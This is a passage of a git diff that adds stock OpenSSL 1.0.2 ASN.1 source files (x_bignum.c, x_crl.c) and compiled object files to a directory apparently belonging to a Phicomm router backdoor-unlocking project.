zYnMxgoq?_>YIHZvIG<y3U>HiH8Rwb{0d!`aKL(s%GtO@=`T3E=jjZ#7S90-&-Np^+
z#P^w%tFf$eecG5Zrj1uVo9v4pGmTvC#BgdNmloC8(^kP2XY!?nrPr;ks8~5wvT$bq
zV!YN-Mbo0>F(v1eb!`mDGiMxB&+T{gt#?%T3e<V1ztgt}V4!ZOzyCR{dt$axu^ZYk
z{aHQUlQ`0F)5Q7SxE??Jw1>T(aoX6|E;xopCIrmq3bHU9X!m<ggwCB1p`~bOU;FO1
zHMl5P^C-3PT+qjT*nkh4^kF4p_mMveewpG=&<{qU@3o{OvDI)oqP^Q{M7rPJH4sU*
zycOvlh-j%uEES2SBI>249z2KlQ>*y>b`zu|?E7TnTJUN#SB0S`KMT97xw9oK?%Dxy
z+X#v6DUV5tu*4Z3B>fD5X8k=ZYw}?sZB9~4Sh)L=M7%I8_UvHK1L>632d_2S2pk>K
z@4{<_HUkH1FlRdhfgisB9Q)@s_U{MiFOyyakH-2<DRvv^bPYWAAE%u4-$2eWHMtHq
zYt$zR@;!MAazFhZxUo<_PI~u#g;=9!h47X;6u^%L@WB8+62PYd_(A|b2OO_sl4i))
zk)QRgiF2@I=54!HoYf1WdAm33)@!D1t8_e_GYj+BFxOi&n@dz}(H7=Vb~I&V&C$U@
ztjrmyY}ypY_(;Mm+E&?wPDHVHPVH!00F7$573+1W2h5tMVZK_kEJ@*}ie#>_C@C;g
z1cjQFw=FT6I&M~qbG`8H6ZHiX1~V&-Qpu~$og7Oe!j{EGeO{vYdUSt;tJ$6q^q20>
z!EaZ`!_@)m))*rvF-F@>*Qo{kUN~;u_Uxem{!{=z62OlK@G^1S8S&l0<DQrJK8deM
z9N#Cb|48DGN&HiZ@0U0}-)K1Q<8W|4Um*lT{vaI8ze5OyT!Vu-@07?pB+l<T<hU2G
z{t(1y$nmR=`3nfakmH&&A4Ld;{9!nl^PU2aVbiW3ha3$#zN6X3C}8~z<%<%R^)ZFx
zJ%OgVXRrSQ6r;;X{Gh~_B#!;#nxZYcXRn_pC`R`&#XNtF@^y*JdTz)277w<=6fo!Y
z;(0RHNH?YEc^!FuSf3=_1x3&MxX|lo%XWSiyj}DBJV!OFl-F%*$rk!t-p&hswq6%{
zt%?cC6M6zt6uAT<Xw*y9LcX+<3%yV+m#qqPR;k*S4j*GZbvs{Jp!`&&p)b~|i&o7(
zOV!pq>{$7-MN|J@PJ?Q^M(P(z5*XS|&uyJiD;qx3cuyx~2=OL;+H6n(-gg)h7JOem
zNnHKX>Qe^-9h!>qImAByYkh+H>;*3ykKZFhh<SYWX=3X5%Ov3EhP%-?AfE*9w|?{V
zDK<koTtB=<>iSIs!=cpi`61eXHrX^efp`)Qzwy7M@z+U@<Kx)s_@{y4`23tf=-LK8
zXkgEHZtKkJ#=Z_M9B+vr_?GHrhOw$$0fz59Reqg-25qwO{F!|K0rsiZ^MY=&ki1%d
z3Ao?-Ez&3X8r9+Y;a4};^ZoBTHt06#g3geS0*m<6-wkZXwFefX4}lMr1yfS@UFTQN
Ne;qDEU$Uw7{{Y;Q{Dc4i

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_bignum.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_bignum.c
new file mode 100644
index 0000000..1f10364
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_bignum.c
@@ -0,0 +1,143 @@
+/* x_bignum.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/bn.h>
+
+/*
+ * Custom primitive type for BIGNUM handling. This reads in an ASN1_INTEGER
+ * as a BIGNUM directly. Currently it ignores the sign which isn't a problem
+ * since all BIGNUMs used are non negative and anything that looks negative
+ * is normally due to an encoding error.
+ */
+
+#define BN_SENSITIVE    1
+
+static int bn_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
+static void bn_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
+
+static int bn_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype,
+                  const ASN1_ITEM *it);
+static int bn_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len,
+                  int utype, char *free_cont, const ASN1_ITEM *it);
+
+static ASN1_PRIMITIVE_FUNCS bignum_pf = {
+    NULL, 0,
+    bn_new,
+    bn_free,
+    0,
+    bn_c2i,
+    bn_i2c
+};
+
+ASN1_ITEM_start(BIGNUM)
+        ASN1_ITYPE_PRIMITIVE, V_ASN1_INTEGER, NULL, 0, &bignum_pf, 0, "BIGNUM"
+ASN1_ITEM_end(BIGNUM)
+
+ASN1_ITEM_start(CBIGNUM)
+        ASN1_ITYPE_PRIMITIVE, V_ASN1_INTEGER, NULL, 0, &bignum_pf, BN_SENSITIVE, "BIGNUM"
+ASN1_ITEM_end(CBIGNUM)
+
+static int bn_new(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+        *pval = (ASN1_VALUE *)BN_new();
+        if(*pval) return 1;
+        else return 0;
+}
+
+static void bn_free(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+        if(!*pval) return;
+        if(it->size & BN_SENSITIVE) BN_clear_free((BIGNUM *)*pval);
+        else BN_free((BIGNUM *)*pval);
+        *pval = NULL;
+}
+
+static int bn_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype, const ASN1_ITEM *it)
+{
+        BIGNUM *bn;
+        int pad;
+        if(!*pval) return -1;
+        bn = (BIGNUM *)*pval;
+        /* If MSB set in an octet we need a padding byte */
+        if(BN_num_bits(bn) & 0x7) pad = 0;
+        else pad = 1;
+        if(cont) {
+                if(pad) *cont++ = 0;
+                BN_bn2bin(bn, cont);
+        }
+        return pad + BN_num_bytes(bn);
+}
+
+static int bn_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len,
+                  int utype, char *free_cont, const ASN1_ITEM *it)
+{
+        BIGNUM *bn;
+        if(!*pval) bn_new(pval, it);
+        bn  = (BIGNUM *)*pval;
+        if(!BN_bin2bn(cont, len, bn)) {
+                bn_free(pval, it);
+                return 0;
+        }
+        return 1;
+}
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_bignum.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_bignum.o
new file mode 100644
index 0000000000000000000000000000000000000000..74f3b5127233774626887075a62001e15a1036f7
GIT binary patch
literal 3352
zcmb`ITZkJ~7=TYQyG^R?B-?t4RCJJ{DcT`P7rZ>!Og72RVs=;EjTE=*<kG1PZZ0Mh
zO+{1)yE<&u^+B*8z6ty2lNWq2P^mtM_#~n)eGo0Ipdzk#BmV!HbGFBmS%l&blmGv}
z^Iy)KIp^g0Tp=F}1PGS^xu0C|I3?tb@D)2v%``bcCde<5TmCQ>`=1UM%>ECt!ulPi
z>l_Zxu72yx72NMHW2CtbWHZ#A{16M9tJ}`Oi+hOY3@`F1u0Oy={XyvbZ@&k=+S;4^
z1`@hoZ(TC`AIFxAlNYezg6aNgt{*p7ht5sg`FOwy(MDV2UcXNiY`e4*>e1DK=_*T+
z*9Vbz2Xx4I#BjefiZkx7#^S8|S<!U=e#q<}C*5$t{rvJr!{N|eFOsagU2uP-C1%{g
z`}hj8tAp<Tg8Q8bybfW>!K2H@Nn_b~>_TQ{dagK&?Ij6HzU=y~xft_b`C{z<YEMs1
z-KWKim2Si7YWM2L^u*ER-CgP?pGzh5#N-hVdtJvsMd2BT2bO}sya&kWCjosOJSc%@
z9wvcaG;nBND7*nLe;C-!bcB#6QRmg@xnNd}^_8re2wG~)P@@?&9D|`Oi@OtbPL1}1
zwi*T#$4c;^9Ks(uHc!VU!F?7P$O-&``mY3YYV2htr)uZMvTA&796I&XxS?tpHI||6
zFw$4>dySEwhkk>K?+L;+;H&WOECnjbvJXH|s6*ET*g?j*PuBn#zAwhV2^xjIKj_=w
zLH-^>5c=+(3A4ekG%5<&GXjqQ2@qUmPtx1~tq5Gez^@hE9a|yzcB7(@{i6_wLarI%
z$AI8IlVt{gA2060tzCG17v9~4<KFV?y9RthSkHUFM|lw*<Y{z3I43=;QhU77t?N}%
zX;`%sRj1pwjc&t!8dWt_BVLr%I!&zU!hFUkSo8V(LT=GoG%|&pMKW_1RDohn2klBD
zRjD=5s;=1OwnZy~$2C^Quo}cQ$dq@FSvAL-9U-?e19$2Hc>aQW4<#pX+?$;9J5Y{)
zNr=b0fXBZo@aqNsw!m)?IK7a;$ND!4Tmu^g&!@P{5|ny;FSAjVm@UV*1TMz&Z;bJH
zC-d_b6XKEc^BI>oKZoLcFrJIX3}hlVCC=-gk~p8w3lisjiQYL|cghvePTSLGxYf2-
z%DQ9s9HO5pJ7uC*Ivt|7o9JM8Qcr@5L6m?6gZfIdT3(SkgVkoeZa1J_qv_Z>{2v_c
zIOXaS%!h5Rx7y8?-FD8h0`?i$k>$G0W`FfcgH-%R@=cZoh7!R+K_r*npSZWuLJXR5
zR&bN?2x!a=GoSB++ZmT{{CT+%%aie4tmf6`Ct3d#tIrkhAL4*%-k)nc*J#WAODv!#
z<!h3k2H$V}zF_NDV)3|sh~)KK2IklQ66>FaaZxnU0s90ze*F{d#Y-$6`(tmpKi>b?
zil0+3sc7s_^8a1V*|ca5vZvtTjK`pUKs?mKfE>F9V>neg{6PjZAs0<Pe~#Y*18d6p
zEe77<flSN!=YjjJ--gfn;lDP|=lkEUH@4E)hT`+U`*gx5AMadw?*Sqk<M>O+Yo6Nq
UmDdkz`sM$`=D)d<=^1kVKU*4ItN;K2

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_crl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_crl.c
new file mode 100644
index 0000000..0279503
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_crl.c
@@ -0,0 +1,517 @@
+/* crypto/asn1/x_crl.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include "asn1_locl.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+static int X509_REVOKED_cmp(const X509_REVOKED *const *a,
+                            const X509_REVOKED *const *b);
+static void setup_idp(X509_CRL *crl, ISSUING_DIST_POINT *idp);
+
+ASN1_SEQUENCE(X509_REVOKED) = {
+        ASN1_SIMPLE(X509_REVOKED,serialNumber, ASN1_INTEGER),
+        ASN1_SIMPLE(X509_REVOKED,revocationDate, ASN1_TIME),
+        ASN1_SEQUENCE_OF_OPT(X509_REVOKED,extensions, X509_EXTENSION)
+} ASN1_SEQUENCE_END(X509_REVOKED)
+
+static int def_crl_verify(X509_CRL *crl, EVP_PKEY *r);
+static int def_crl_lookup(X509_CRL *crl,
+                          X509_REVOKED **ret, ASN1_INTEGER *serial,
+                          X509_NAME *issuer);
+
+static X509_CRL_METHOD int_crl_meth = {
+    0,
+    0, 0,
+    def_crl_lookup,
+    def_crl_verify
+};
+
+static const X509_CRL_METHOD *default_crl_method = &int_crl_meth;
+
+/*
+ * The X509_CRL_INFO structure needs a bit of customisation. Since we cache
+ * the original encoding the signature wont be affected by reordering of the
+ * revoked field.
+ */
+static int crl_inf_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                      void *exarg)
+{
+    X509_CRL_INFO *a = (X509_CRL_INFO *)*pval;
+
+    if (!a || !a->revoked)
+        return 1;
+    switch (operation) {
+        /*
+         * Just set cmp function here. We don't sort because that would
+         * affect the output of X509_CRL_print().
+         */
+    case ASN1_OP_D2I_POST:
+        (void)sk_X509_REVOKED_set_cmp_func(a->revoked, X509_REVOKED_cmp);
+        break;
+    }
+    return 1;
+}
+
+
+ASN1_SEQUENCE_enc(X509_CRL_INFO, enc, crl_inf_cb) = {
+        ASN1_OPT(X509_CRL_INFO, version, ASN1_INTEGER),
+        ASN1_SIMPLE(X509_CRL_INFO, sig_alg, X509_ALGOR),
+        ASN1_SIMPLE(X509_CRL_INFO, issuer, X509_NAME),
+        ASN1_SIMPLE(X509_CRL_INFO, lastUpdate, ASN1_TIME),
+        ASN1_OPT(X509_CRL_INFO, nextUpdate, ASN1_TIME),
+        ASN1_SEQUENCE_OF_OPT(X509_CRL_INFO, revoked, X509_REVOKED),
+        ASN1_EXP_SEQUENCE_OF_OPT(X509_CRL_INFO, extensions, X509_EXTENSION, 0)
+} ASN1_SEQUENCE_END_enc(X509_CRL_INFO, X509_CRL_INFO)
+
+/*
+ * Set CRL entry issuer according to CRL certificate issuer extension. Check
+ * for unhandled critical CRL entry extensions.
+ */
+
+static int crl_set_issuers(X509_CRL *crl)
+{
+
+    int i, j;
+    GENERAL_NAMES *gens, *gtmp;
+    STACK_OF(X509_REVOKED) *revoked;
+
+    revoked = X509_CRL_get_REVOKED(crl);
+
+    gens = NULL;
+    for (i = 0; i < sk_X509_REVOKED_num(revoked); i++) {
+        X509_REVOKED *rev = sk_X509_REVOKED_value(revoked, i);
+        STACK_OF(X509_EXTENSION) *exts;
+        ASN1_ENUMERATED *reason;
+        X509_EXTENSION *ext;
+        gtmp = X509_REVOKED_get_ext_d2i(rev,
+                                        NID_certificate_issuer, &j, NULL);
+        if (!gtmp && (j != -1)) {
+            crl->flags |= EXFLAG_INVALID;
+            return 1;
+        }
+
+        if (gtmp) {
+            gens = gtmp;
+            if (!crl->issuers) {
+                crl->issuers = sk_GENERAL_NAMES_new_null();
+                if (!crl->issuers)
+                    return 0;
+            }
+            if (!sk_GENERAL_NAMES_push(crl->issuers, gtmp))
+                return 0;
+        }
+        rev->issuer = gens;
+
+        reason = X509_REVOKED_get_ext_d2i(rev, NID_crl_reason, &j, NULL);
+        if (!reason && (j != -1)) {
+            crl->flags |= EXFLAG_INVALID;
+            return 1;
+        }
+
+        if (reason) {
+            rev->reason = ASN1_ENUMERATED_get(reason);
+            ASN1_ENUMERATED_free(reason);
+        } else
+            rev->reason = CRL_REASON_NONE;
+
+        /* Check for critical CRL entry extensions */
+
+        exts = rev->extensions;
+
+        for (j = 0; j < sk_X509_EXTENSION_num(exts); j++) {
+            ext = sk_X509_EXTENSION_value(exts, j);
+            if (ext->critical > 0) {
+                if (OBJ_obj2nid(ext->object) == NID_certificate_issuer)
+                    continue;
+                crl->flags |= EXFLAG_CRITICAL;
+                break;
+            }
+        }
+
+    }
+
+    return 1;
+
+}
+
+/*
+ * The X509_CRL structure needs a bit of customisation. Cache some extensions
+ * and hash of the whole CRL.
+ */
+static int crl_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    X509_CRL *crl = (X509_CRL *)*pval;
+    STACK_OF(X509_EXTENSION) *exts;
+    X509_EXTENSION *ext;
+    int idx;
+
+    switch (operation) {
+    case ASN1_OP_NEW_POST:
+        crl->idp = NULL;
+        crl->akid = NULL;
+        crl->flags = 0;
+        crl->idp_flags = 0;
+        crl->idp_reasons = CRLDP_ALL_REASONS;
+        crl->meth = default_crl_method;
+        crl->meth_data = NULL;
+        crl->issuers = NULL;
+        crl->crl_number = NULL;
+        crl->base_crl_number = NULL;
+        break;
+
+    case ASN1_OP_D2I_POST:
+#ifndef OPENSSL_NO_SHA
+        X509_CRL_digest(crl, EVP_sha1(), crl->sha1_hash, NULL);
+#endif
+        crl->idp = X509_CRL_get_ext_d2i(crl,
+                                        NID_issuing_distribution_point, NULL,
+                                        NULL);
+        if (crl->idp)
+            setup_idp(crl, crl->idp);
+
+        crl->akid = X509_CRL_get_ext_d2i(crl,
+                                         NID_authority_key_identifier, NULL,
+                                         NULL);
+
+        crl->crl_number = X509_CRL_get_ext_d2i(crl,
+                                               NID_crl_number, NULL, NULL);
+
+        crl->base_crl_number = X509_CRL_get_ext_d2i(crl,
+                                                    NID_delta_crl, NULL,
+                                                    NULL);
+        /* Delta CRLs must have CRL number */
+        if (crl->base_crl_number && !crl->crl_number)
+            crl->flags |= EXFLAG_INVALID;
+
+        /*
+         * See if we have any unhandled critical CRL extensions and indicate
+         * this in a flag. We only currently handle IDP so anything else
+         * critical sets the flag. This code accesses the X509_CRL structure
+         * directly: applications shouldn't do this.
+         */
+
+        exts = crl->crl->extensions;
+
+        for (idx = 0; idx < sk_X509_EXTENSION_num(exts); idx++) {
+            int nid;
+            ext = sk_X509_EXTENSION_value(exts, idx);
+            nid = OBJ_obj2nid(ext->object);
+            if (nid == NID_freshest_crl)
+                crl->flags |= EXFLAG_FRESHEST;
+            if (ext->critical > 0) {
+                /* We handle IDP and deltas */
+                if ((nid == NID_issuing_distribution_point)
+                    || (nid == NID_authority_key_identifier)
+                    || (nid == NID_delta_crl))
+                    break;;
+                crl->flags |= EXFLAG_CRITICAL;
+                break;
+            }
+        }
+
+        if (!crl_set_issuers(crl))
+            return 0;
+
+        if (crl->meth->crl_init) {
+            if (crl->meth->crl_init(crl) == 0)
+                return 0;
+        }
+        break;
+
+    case ASN1_OP_FREE_POST:
+        if (crl->meth->crl_free) {
+            if (!crl->meth->crl_free(crl))
+                return 0;
+        }
+        if (crl->akid)
+            AUTHORITY_KEYID_free(crl->akid);
+        if (crl->idp)
+            ISSUING_DIST_POINT_free(crl->idp);
+        ASN1_INTEGER_free(crl->crl_number);
+        ASN1_INTEGER_free(crl->base_crl_number);
+        sk_GENERAL_NAMES_pop_free(crl->issuers, GENERAL_NAMES_free);
+        break;
+    }
+    return 1;
+}
+
+/* Convert IDP into a more convenient form */
+
+static void setup_idp(X509_CRL *crl, ISSUING_DIST_POINT *idp)
+{
+    int idp_only = 0;
+    /* Set various flags according to IDP */
+    crl->idp_flags |= IDP_PRESENT;
+    if (idp->onlyuser > 0) {
+        idp_only++;
+        crl->idp_flags |= IDP_ONLYUSER;
+    }
+    if (idp->onlyCA > 0) {
+        idp_only++;
+        crl->idp_flags |= IDP_ONLYCA;
+    }
+    if (idp->onlyattr > 0) {
+        idp_only++;
+        crl->idp_flags |= IDP_ONLYATTR;
+    }
+
+    if (idp_only > 1)
+        crl->idp_flags |= IDP_INVALID;
+
+    if (idp->indirectCRL > 0)
+        crl->idp_flags |= IDP_INDIRECT;
+
+    if (idp->onlysomereasons) {
+        crl->idp_flags |= IDP_REASONS;
+        if (idp->onlysomereasons->length > 0)
+            crl->idp_reasons = idp->onlysomereasons->data[0];
+        if (idp->onlysomereasons->length > 1)
+            crl->idp_reasons |= (idp->onlysomereasons->data[1] << 8);
+        crl->idp_reasons &= CRLDP_ALL_REASONS;
+    }
+
+    DIST_POINT_set_dpname(idp->distpoint, X509_CRL_get_issuer(crl));
+}
+
+ASN1_SEQUENCE_ref(X509_CRL, crl_cb, CRYPTO_LOCK_X509_CRL) = {
+        ASN1_SIMPLE(X509_CRL, crl, X509_CRL_INFO),
+        ASN1_SIMPLE(X509_CRL, sig_alg, X509_ALGOR),
+        ASN1_SIMPLE(X509_CRL, signature, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END_ref(X509_CRL, X509_CRL)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_REVOKED)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_REVOKED)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_CRL_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_CRL)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_CRL)
+
+static int X509_REVOKED_cmp(const X509_REVOKED *const *a,
+                            const X509_REVOKED *const *b)
+{
+    return (ASN1_STRING_cmp((ASN1_STRING *)(*a)->serialNumber,
+                            (ASN1_STRING *)(*b)->serialNumber));
+}
+
+int X509_CRL_add0_revoked(X509_CRL *crl, X509_REVOKED *rev)
+{
+    X509_CRL_INFO *inf;
+    inf = crl->crl;
+    if (!inf->revoked)
+        inf->revoked = sk_X509_REVOKED_new(X509_REVOKED_cmp);
+    if (!inf->revoked || !sk_X509_REVOKED_push(inf->revoked, rev)) {
+        ASN1err(ASN1_F_X509_CRL_ADD0_REVOKED, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    inf->enc.modified = 1;
+    return 1;
+}
+
+int X509_CRL_verify(X509_CRL *crl, EVP_PKEY *r)
+{
+    if (crl->meth->crl_verify)
+        return crl->meth->crl_verify(crl, r);
+    return 0;
+}
+
+int X509_CRL_get0_by_serial(X509_CRL *crl,
+                            X509_REVOKED **ret, ASN1_INTEGER *serial)
+{
+    if (crl->meth->crl_lookup)
+        return crl->meth->crl_lookup(crl, ret, serial, NULL);
+    return 0;
+}
+
+int X509_CRL_get0_by_cert(X509_CRL *crl, X509_REVOKED **ret, X509 *x)
+{
+    if (crl->meth->crl_lookup)
+        return crl->meth->crl_lookup(crl, ret,
+                                     X509_get_serialNumber(x),
+                                     X509_get_issuer_name(x));
+    return 0;
+}
+
+static int def_crl_verify(X509_CRL *crl, EVP_PKEY *r)
+{
+    return (ASN1_item_verify(ASN1_ITEM_rptr(X509_CRL_INFO),
+                             crl->sig_alg, crl->signature, crl->crl, r));
+}
+
+static int crl_revoked_issuer_match(X509_CRL *crl, X509_NAME *nm,
+                                    X509_REVOKED *rev)
+{
+    int i;
+
+    if (!rev->issuer) {
+        if (!nm)
+            return 1;
+        if (!X509_NAME_cmp(nm, X509_CRL_get_issuer(crl)))
+            return 1;
+        return 0;
+    }
+
+    if (!nm)
+        nm = X509_CRL_get_issuer(crl);
+
+    for (i = 0; i < sk_GENERAL_NAME_num(rev->issuer); i++) {
+        GENERAL_NAME *gen = sk_GENERAL_NAME_value(rev->issuer, i);
+        if (gen->type != GEN_DIRNAME)
+            continue;
+        if (!X509_NAME_cmp(nm, gen->d.directoryName))
+            return 1;
+    }
+    return 0;
+
+}
+
+static int def_crl_lookup(X509_CRL *crl,
+                          X509_REVOKED **ret, ASN1_INTEGER *serial,
+                          X509_NAME *issuer)
+{
+    X509_REVOKED rtmp, *rev;
+    int idx;
+    rtmp.serialNumber = serial;
+    /*
+     * Sort revoked into serial number order if not already sorted. Do this
+     * under a lock to avoid race condition.
+     */
+    if (!sk_X509_REVOKED_is_sorted(crl->crl->revoked)) {
+        CRYPTO_w_lock(CRYPTO_LOCK_X509_CRL);
+        sk_X509_REVOKED_sort(crl->crl->revoked);
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509_CRL);
+    }
+    idx = sk_X509_REVOKED_find(crl->crl->revoked, &rtmp);
+    if (idx < 0)
+        return 0;
+    /* Need to look for matching name */
+    for (; idx < sk_X509_REVOKED_num(crl->crl->revoked); idx++) {
+        rev = sk_X509_REVOKED_value(crl->crl->revoked, idx);
+        if (ASN1_INTEGER_cmp(rev->serialNumber, serial))
+            return 0;
+        if (crl_revoked_issuer_match(crl, issuer, rev)) {
+            if (ret)
+                *ret = rev;
+            if (rev->reason == CRL_REASON_REMOVE_FROM_CRL)
+                return 2;
+            return 1;
+        }
+    }
+    return 0;
+}
+
+void X509_CRL_set_default_method(const X509_CRL_METHOD *meth)
+{
+    if (meth == NULL)
+        default_crl_method = &int_crl_meth;
+    else
+        default_crl_method = meth;
+}
+
+X509_CRL_METHOD *X509_CRL_METHOD_new(int (*crl_init) (X509_CRL *crl),
+                                     int (*crl_free) (X509_CRL *crl),
+                                     int (*crl_lookup) (X509_CRL *crl,
+                                                        X509_REVOKED **ret,
+                                                        ASN1_INTEGER *ser,
+                                                        X509_NAME *issuer),
+                                     int (*crl_verify) (X509_CRL *crl,
+                                                        EVP_PKEY *pk))
+{
+    X509_CRL_METHOD *m;
+    m = OPENSSL_malloc(sizeof(X509_CRL_METHOD));
+    if (!m)
+        return NULL;
+    m->crl_init = crl_init;
+    m->crl_free = crl_free;
+    m->crl_lookup = crl_lookup;
+    m->crl_verify = crl_verify;
+    m->flags = X509_CRL_METHOD_DYNAMIC;
+    return m;
+}
+
+void X509_CRL_METHOD_free(X509_CRL_METHOD *m)
+{
+    if (!(m->flags & X509_CRL_METHOD_DYNAMIC))
+        return;
+    OPENSSL_free(m);
+}
+
+void X509_CRL_set_meth_data(X509_CRL *crl, void *dat)
+{
+    crl->meth_data = dat;
+}
+
+void *X509_CRL_get_meth_data(X509_CRL *crl)
+{
+    return crl->meth_data;
+}
+
+IMPLEMENT_STACK_OF(X509_REVOKED)
+
